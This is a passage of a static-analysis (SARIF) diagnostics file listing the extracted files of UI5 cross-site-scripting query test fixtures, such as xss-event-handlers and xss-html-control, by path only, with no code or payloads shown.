ocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":449}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/package.json","uriBaseId":"%SRCROOT%","index":450}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":451}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":452}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":453}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":454}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":455}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":456}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-property-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":457}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package-lock.json","uriBaseId":"%SRCROOT%","index":458}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/package.json","uriBaseId":"%SRCROOT%","index":459}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/ui5.yaml","uriBaseId":"%SRCROOT%","index":460}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/control/xss.js","uriBaseId":"%SRCROOT%","index":461}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":462}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.js","uriBaseId":"%SRCROOT%","index":463}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/index.html","uriBaseId":"%SRCROOT%","index":464}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":465}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-custom-control-sanitized/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":466}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package-lock.json","uriBaseId":"%SRCROOT%","index":467}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/package.json","uriBaseId":"%SRCROOT%","index":468}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/ui5.yaml","uriBaseId":"%SRCROOT%","index":469}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.html","uriBaseId":"%SRCROOT%","index":470}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":471}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/index.js","uriBaseId":"%SRCROOT%","index":472}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":473}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/package-lock.json","uriBaseId":"%SRCROOT%","index":474}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-event-handlers/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":475}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/package.json","uriBaseId":"%SRCROOT%","index":476}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/ui5.yaml","uriBaseId":"%SRCROOT%","index":477}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/Component.js","uriBaseId":"%SRCROOT%","index":478}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App1.controller.js","uriBaseId":"%SRCROOT%","index":479}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App2.controller.js","uriBaseId":"%SRCROOT%","index":480}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App3.controller.js","uriBaseId":"%SRCROOT%","index":481}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/App4.controller.js","uriBaseId":"%SRCROOT%","index":482}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":483}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/index.html","uriBaseId":"%SRCROOT%","index":484}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/index.js","uriBaseId":"%SRCROOT%","index":485}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":486}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/view/App1.view.xml","uriBaseId":"%SRCROOT%","index":487}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/view/App2.view.xml","uriBaseId":"%SRCROOT%","index":488}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/view/App3.view.xml","uriBaseId":"%SRCROOT%","index":489}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/view/App4.view.xml","uriBaseId":"%SRCROOT%","index":490}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-eventbus-with-data/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":491}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/package.json","uriBaseId":"%SRCROOT%","index":492}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/ui5.yaml","uriBaseId":"%SRCROOT%","index":493}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/controller/Main.controller.js","uriBaseId":"%SRCROOT%","index":494}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/index.html","uriBaseId":"%SRCROOT%","index":495}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/index.js","uriBaseId":"%SRCROOT%","index":496}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":497}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/view/Main.view.html","uriBaseId":"%SRCROOT%","index":498}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-fragment-static-byid/webapp/view/PayloadForm.fragment.xml","uriBaseId":"%SRCROOT%","index":499}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package-lock.json","uriBaseId":"%SRCROOT%","index":500}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/package.json","uriBaseId":"%SRCROOT%","index":501}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/ui5.yaml","uriBaseId":"%SRCROOT%","index":502}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":503}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.html","uriBaseId":"%SRCROOT%","index":504}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/index.js","uriBaseId":"%SRCROOT%","index":505}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":506}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":507}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package-lock.json","uriBaseId":"%SRCROOT%","index":508}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/package.json","uriBaseId":"%SRCROOT%","index":509}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/ui5.yaml","uriBaseId":"%SRCROOT%","index":510}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":511}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.html","uriBaseId":"%SRCROOT%","index":512}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/index.js","uriBaseId":"%SRCROOT%","index":513}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":514}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-df/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":515}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package-lock.json","uriBaseId":"%SRCROOT%","index":516}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/package.json","uriBaseId":"%SRCROOT%","index":517}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/ui5.yaml","uriBaseId":"%SRCROOT%","index":518}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":519}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.html","uriBaseId":"%SRCROOT%","index":520}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/index.js","uriBaseId":"%SRCROOT%","index":521}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":522}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-control-oneway/webapp/view/app.view.xml","uriBaseId":"%SRCROOT%","index":523}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package-lock.json","uriBaseId":"%SRCROOT%","index":524}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/ui5.yaml","uriBaseId":"%SRCROOT%","index":525}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/package.json","uriBaseId":"%SRCROOT%","index":526}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/app.controller.js","uriBaseId":"%SRCROOT%","index":527}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/controller/model.json","uriBaseId":"%SRCROOT%","index":528}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.html","uriBaseId":"%SRCROOT%","index":529}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/index.js","uriBaseId":"%SRCROOT%","index":530}}}],"message":{"text":""},"level":"none","descriptor":{"id":"js/diagnostics/successfully-extracted-files","index":0,"toolComponent":{"index":1}},"properties":{"formattedMessage":{"text":""}}},{"locations":[{"physicalLocation":{"artifactLocation":{"uri":"javascript/frameworks/ui5/test/queries/UI5Xss/xss-html-external-model/webapp/manifest.json","uriBaseId":"%SRCROOT%","index":531}}}],"message":{"text":""},"level":"none","descriptor":